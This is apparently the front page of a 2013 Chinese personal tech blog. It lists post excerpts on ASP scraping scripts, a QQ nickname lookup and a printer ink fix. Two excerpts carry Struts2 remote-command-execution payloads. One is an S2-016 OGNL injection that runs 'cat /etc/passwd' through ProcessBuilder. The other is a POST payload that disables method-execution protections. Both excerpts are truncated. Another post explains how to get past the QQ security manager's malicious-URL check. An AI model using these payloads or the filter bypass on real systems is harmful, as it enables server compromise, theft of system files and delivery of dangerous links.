价值or利益

作者:admin 发布于:2013-8-19 12:10 Monday

你妹...


阅读全文>>

评论(5) 引用(0) 浏览(1006)

Struts2 S2-016利用exp

作者:admin 发布于:2013-7-17 15:50 Wednesday

?redirect:${%23a%3d(new java.lang.ProcessBuilder(new java.lang.String[]{'cat','/etc/passwd'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew java.io.InputStreamReader(%23b),%23d%3dnew java.io.Bu...

阅读全文>>

标签: S2-016 Struts2

评论(23) 引用(0) 浏览(2159)

阿里的一些(淘宝 支付宝 一淘...)xss

作者:admin 发布于:2013-7-12 8:09 Friday

[该文章已设置加密,请点击标题输入密码访问]

评论(0) 引用(0) 浏览(0)

stuts2 exp for post

作者:admin 发布于:2013-7-12 8:04 Friday

网站物理路径: 
('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeP...

阅读全文>>

标签: stuts2

评论(3) 引用(0) 浏览(3194)

逆天五岁小屁孩开铲车,月薪4K超大学生。

作者:admin 发布于:2013-6-5 10:20 Wednesday

转自腾讯视频:


阅读全文>>

标签: 小屁孩 铲车

评论(0) 引用(0) 浏览(977)

绕过qq安全管家对危险网址的检测

作者:admin 发布于:2013-6-4 16:11 Tuesday

QQ客户端对用户发送的网址进行不严谨的检测可进行ip验证逃过检查。

具体方法:

1、探测QQ网址检测ip,这里通过在QQ上发送url/1.asp,文件内代码:

x=request.servervariables("SERVER_NAME")

ip=Request.ServerVariables("REMOTE_ADDR")

url=request.servervar...

阅读全文>>

标签: QQ 安全管家

评论(62) 引用(0) 浏览(2005)

asp获取QQ用户昵称

作者:admin 发布于:2013-6-3 1:30 Monday

<%
fuck=request.querystring("u")  '获取参数
url="http://photo.qq.com/cgi-bin/common/cgi_get_userinfo?uin="&fuck&""  '对远程网址请求
str=getHTTPPage(url)
piaoye=strcut(str,"<nick>&lt;![CDATA[","]]&gt;</nick>",2)
Function getHTTPPage(url) 
On Error Resume Next 
dim http 
set http=Server.createobject("Microsoft.XMLHTTP") 
Http.open "GET",url,false 
Http.send() 
if Http.readystate<>4 then 
exit function 
end if 
getHTTPPage=bytesToBSTR(Http.responseBody,"GBK") 
set http=nothing 
If Err.number<>0 then 
Response.Write "<p align='center'><font color='red'><b>服务器获取文件内容出错</b></font></p>" 
Err.Clear 
End If 
End Function 
Function BytesToBstr(body,Cset) 
dim objstream 
set objstream = Server.CreateObject("adodb.stream") 
objstream.Type = 1 
objstream.Mode =3 
objstream.Open 
objstream.Write body 
objstream.Position = 0 
objstream.Type = 2 
objstream.Charset = Cset 
BytesToBstr = objstream.ReadText 
objstream.Close 
set objstream = nothing 
End Function 

'截取字符串,1.包括起始和终止字符,2.不包括 
Function strCut(strContent,StartStr,EndStr,CutType) 
Dim strHtml,S1,S2 
strHtml = strContent 
On Error Resume Next 
Select Case CutType 
Case 1 
S1 = InStr(strHtml,StartStr) 
S2 = InStr(S1,strHtml,EndStr)+Len(EndStr) 
Case 2 
S1 = InStr(strHtml,StartStr)+Len(StartStr) 
S2 = InStr(S1,strHtml,EndStr) 
End Select 
If Err Then 
strCute = "<p align='center'>没有找到需要的内容。</p>" 
Err.Clear 
Exit Function 
Else 
strCut = Mid(strHtml,S1,S2-S1) 
End If 
End Function 
%>
昵称:<%=piaoye%>

保存为x.asp,参数u为QQ号码。
x.asp?u=QQ号码 
	

标签: asp 获取 QQ 用户昵称

评论(25) 引用(0) 浏览(1368)

asp定向采集输出

作者:admin 发布于:2013-6-1 16:45 Saturday

昨天那客户缠了半天又让写个采集规则,把一些图表弄到他网站,一点心思都没介绍给朋友做,朋友也不想弄主要不赚钱,熬不过这家伙,磨蹭的写了个,核心代码:


<%
nian=request.querystring("id")  '获取参数
if nian="" or nian <0 then
Response.Write "点错了"
end if
url="http://url.com/index.asp?id="&nian&""  '对远程网址请求
str=getHTTPPage(url)  
'title=strcut(str,"<table border=""1"" cellpadding=""0"" cellspacing=""0"" bgcolor=""#EAFBC5"" bordercolor=""#666666""  >","<div align=""center"">",2)  
content=strcut(str,"<div class=""cen"">","<!--bottom-->",2) '检索开始结束
piaoye= Replace(content,"xxx.com","baidu.com") '对内容进行正则替换
piaoye= Replace(content,"index.asp?year=2013&s=1&action=&id=&allid=&certainYear=&certainTerm=&n1=&n2=&n3=&n4=&n5=&n6=&n7=&history_year=","luoqiu.asp")
piaoye= Replace(content,"index.asp?year=2013&s=1&action=&id=&allid=&certainYear=&certainTerm=&n1=&n2=&n3=&n4=&n5=&n6=&n7=&history_year=","daxiao.asp")
'response.write ""&piaoye
Function getHTTPPage(url)  
On Error Resume Next  
dim http  
set http=Server.createobject("Microsoft.XMLHTTP")   '创建xmlhttp请求
Http.open "GET",url,false  
Http.send()  
if Http.readystate<>4 then  
exit function  
end if  
getHTTPPage=bytesToBSTR(Http.responseBody,"GB2312")   '编码很重要,MD害我输出乱码
set http=nothing  
If Err.number<>0 then  
Response.Write "获取失败"  
Err.Clear  
End If  
End Function  
Function BytesToBstr(body,Cset)  
dim objstream  
set objstream = Server.CreateObject("adodb.stream")
'adodb.stream 创建获取远程内容
objstream.Mode =3 
objstream.Open objstream.Write body objstream.Position = 0 objstream.Type = 2 objstream.Charset = Cset BytesToBstr = objstream.ReadText objstream.Close set objstream = nothing End Function '截取字符串,1.包括起始和终止字符,2.不包括 Function strCut(strContent,StartStr,EndStr,CutType) Dim strHtml,S1,S2 strHtml = strContent On Error Resume Next Select Case CutType Case 1 S1 = InStr(strHtml,StartStr) S2 = InStr(S1,strHtml,EndStr)+Len(EndStr) Case 2 S1 = InStr(strHtml,StartStr)+Len(StartStr) S2 = InStr(S1,strHtml,EndStr) End Select If Err Then strCute = "<p align='center'>没有找到需要的内容。</p>" Err.Clear Exit Function Else strCut = Mid(strHtml,S1,S2-S1) End If End Function %> 
<!--开始自定义样式并调用数据-->
<body id="index" onkeydown="if(event.keyCode==27) return false;" style="background-image: url(''); ">
<table class="table" align="center"><tr><td>
<table class="table1" align="center">
<div align="center"><%=piaoye%></div>
</body>
</html>


评论(0) 引用(0) 浏览(644)

佳能IP1180打印机使用国产墨盒不识别或没墨解决方法

作者:admin 发布于:2013-6-1 8:54 Saturday

前段时间弄了几个蓝博的831墨盒,打印没几天就提示没墨水,清零重置后也一样,还以为墨盒问题,问了兰博的人说国产墨盒识别不出来,给了个解决方法:

1.关闭打印机电源。并把电源线从电源插座拔开。

2.
按紧打印机的电源键同时插上电源线。(此时机器电源灯亮)

3.
不松开电源键。按2下进纸键。电源灯显示:第一下黄--第二下绿,然后松开电源键,就可以打印了.如果关机之后在开机还出现此情况,就按上面步骤再做一次.


测试有效,兰博的xxl大容量,每天一二十张彩色打印,单张覆盖10%,用一月差不多。不错。

标签: 佳能IP1180 国产墨盒 没墨

评论(0) 引用(0) 浏览(608)

asp蛋疼

作者:admin 发布于:2013-5-31 17:13 Friday

  下午本抽空把朋友的系统做一做,不一会有个人加Q让帮写个asp脚本,具体实现:本地导航--然后根据参数读取远程图片--禁止查看图片真实地址,必须用asp,这里必须用asp输出src。。也就是src =x.asp?xxxx


实现代码:


首页导航index.asp
<a href=1.asp?aid=xx>
1.asp代码:
<img width=940  src="images.asp?aid=<%=aid%>" /> 

images.asp代码 获取aid参数
<%
From_url = Cstr(Request.ServerVariables("HTTP_REFERER"))
Serv_url = Cstr(Request.ServerVariables("SERVER_NAME"))
if mid(From_url,8,len(Serv_url)) <> Serv_url then
response.write "卧槽你干嘛?" 
response.end
end if
dim pr
pr=Request.QueryString("aid")
'Server.Transfer(""&pr&".jpg")'读取本地图片
response.Redirect "http://www.xxx.com/tukuk/tu/" & pr & ".jpg"  
%>

比较简单。


评论(0) 引用(0) 浏览(602)

Powered by emlog